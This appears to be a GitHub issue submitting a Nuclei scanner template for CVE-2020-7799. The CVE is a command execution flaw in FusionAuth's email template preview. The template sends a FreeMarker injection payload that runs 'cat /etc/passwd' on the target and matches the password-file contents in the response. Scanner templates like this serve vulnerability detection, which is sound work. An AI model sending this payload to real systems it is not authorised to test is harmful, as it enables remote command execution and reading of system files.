### ISSUE TITLE
CVE-2020-7799

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#5347]
```yaml
id: CVE-2020-7799

info:
  name: FusionAuth command execution via Apache Freemarker Template
  author: akincibor
  severity: critical
  description: An issue was discovered in FusionAuth before 1.11.0. An authenticated user, allowed to edit e-mail templates (Home -> Settings -> Email Templates) or themes (Home -> Settings -> Themes), can execute commands on the underlying operating system by abusing freemarker.template.utility.Execute in the Apache FreeMarker engine that processes custom templates.
  reference:
    - https://twitter.com/momika233/status/1225374547123159040
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7799
  tags: cve,cve2020,rce,apache

requests:
  - raw:
      - |-
        POST /ajax/email/template/preview HTTP/1.1
        Host: {{Hostname}}
        Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "macOS"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate
        Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
        Connection: close
        Content-Length: 119

        FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}}

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
```
